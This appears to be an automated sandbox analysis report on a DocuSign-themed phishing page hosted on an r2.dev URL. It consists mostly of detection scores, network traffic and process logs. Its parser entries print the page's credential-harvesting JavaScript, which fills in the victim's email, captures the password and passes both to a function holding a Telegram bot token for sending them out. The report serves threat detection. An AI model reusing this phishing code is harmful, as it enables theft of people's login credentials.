Source: http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering |
Source: pub-7c9ee239002440a79f4b2c5934b13627.r2.dev |
Virustotal: Detection: 13% |
Perma Link |
Source: http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
Virustotal: Detection: 14% |
Perma Link |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
LLM: Score: 7 Reasons: The brand 'PDF ENCRYPT, Inc.' is not widely recognized and falls under 'unknown'., The URL 'pub-7c9ee239002440a79f4b2c5934b13627.r2.dev' does not match the expected domain for 'PDF ENCRYPT, Inc.'., The URL contains a long string of characters which is unusual for legitimate domains., The domain extension '.dev' is not commonly used for commercial services and can be suspicious., The presence of input fields for 'Password' and 'Enter password' without a clear context or secure domain raises suspicion. DOM: 0.0.pages.csv |
Source: Yara match |
File source: 0.0.pages.csv, type: HTML |
Source: Yara match |
File source: dropped/chromecache_52, type: DROPPED |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);} |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "njgyndg2ntqzndpbquzdnznjthjay1bgwwndm3rtstfkby1jt2g3rzlncfvoutc=="; var chat_id= ... |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
Matcher: Template: docusign matched with high similarity |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: Number of links: 0 |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: Title: View Secure Document - Sign in does not match URL |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: On click: sendEmail() |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: <input type="password" .../> found |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: No <meta name="author".. found |
Source: https://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html |
HTTP Parser: No <meta name="copyright".. found |
Source: unknown |
HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2 |
Source: global traffic |
TCP traffic: 192.168.2.4:50296 -> 1.1.1.1:53 |
Source: global traffic |
TCP traffic: 192.168.2.4:64382 -> 1.1.1.1:53 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 184.28.90.27 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 93.184.221.240 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 93.184.221.240 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 93.184.221.240 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 93.184.221.240 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /higher.html HTTP/1.1Host: pub-7c9ee239002440a79f4b2c5934b13627.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png HTTP/1.1Host: cdn4.iconfinder.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /C8yD9g5/US-payment-terms-1.jpg HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png HTTP/1.1Host: cdn4.iconfinder.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /C8yD9g5/US-payment-terms-1.jpg HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /higher.html HTTP/1.1Host: pub-7c9ee239002440a79f4b2c5934b13627.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
DNS traffic detected: DNS query: pub-7c9ee239002440a79f4b2c5934b13627.r2.dev |
Source: global traffic |
DNS traffic detected: DNS query: cdn4.iconfinder.com |
Source: global traffic |
DNS traffic detected: DNS query: i.ibb.co |
Source: global traffic |
DNS traffic detected: DNS query: www.google.com |
Source: global traffic |
DNS traffic detected: DNS query: logo.clearbit.com |
Source: chromecache_52.2.dr |
String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js |
Source: chromecache_52.2.dr |
String found in binary or memory: https://api.telegram.org/bot$ |
Source: chromecache_52.2.dr |
String found in binary or memory: https://cdn4.iconfinder.com/data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.pn |
Source: chromecache_52.2.dr |
String found in binary or memory: https://i.ibb.co/C8yD9g5/US-payment-terms-1.jpg |
Source: chromecache_52.2.dr |
String found in binary or memory: https://logo.clearbit.com/ |
Source: unknown |
Network traffic detected: HTTP traffic on port 49675 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64388 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64388 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: unknown |
HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2 |
Source: classification engine |
Classification label: mal92.phis.win@17/13@18/10 |
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2224,i,13459048935770078743,2555675960266731751,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
|
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html" |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2224,i,13459048935770078743,2555675960266731751,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |